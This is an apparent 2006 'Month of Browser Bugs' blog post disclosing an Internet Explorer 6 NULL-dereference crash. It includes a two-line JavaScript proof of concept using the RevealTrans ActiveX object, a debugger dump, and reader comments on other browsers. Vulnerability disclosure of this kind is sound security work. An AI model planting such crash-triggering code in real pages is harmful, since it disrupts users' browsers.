MoBB #13: RevealTrans Transition
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the Transition property of this object triggers a NULL dereference.
var a = new ActiveXObject('DXImageTransform.Microsoft.RevealTrans.1');
a.Transition = 1;
Demonstration
eax=00000000 ebx=00000000 ecx=35cde0c4
edx=00174972 esi=02d701d8 edi=00000001
eip=35cde0fe esp=0012b240 ebp=0012b25c
dxtmsft!CDXTRevealTrans::put_Transition+0x3a:
35cde0fe 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference
posted by hdm @ 10:53 PM
3 comments
links to this post
3 Comments:
Other than #4 (Firefox) and #5 (Safari), the MoBB looks more like the MoIEBB: Month of Internet Explorer Browser Bugs. Not only that, but the Firefox bug was fixed in a point release before you posted the bug, and the Safari bug was fixed in the WebKit open source project on March 21 (r13415).
Are there any non-MSIE bugs to "look forward to" the rest of the month?
Yup. There is a code execution bug in the latest version of Firefox, but tracking down how and why it works has been taking more time than I expected. There are dozens of bugs in Safari/Konqueror, but nothing really that interesting IMO. Opera 9.0 fixed most of the bugs I documented in 8.5, but I haven't had a chance to do more than a quick test. The IE bugs have been used as "filler" if you will until the rest of the testing is complete. Thanks for the feedback!
Does not crash IE7. Indeed, even before the code is allowed to run the user must click the Information Bar and allow it. Then the code can be run, but IE7 just reports a script error ("Unspecified error").
It doesn't crash my IE6 either. I get an "Automation server cannot create object" script error. It could be because I tightened up the default security settings. :)
Post a Comment
Links to this post:
Create a Link
<< Home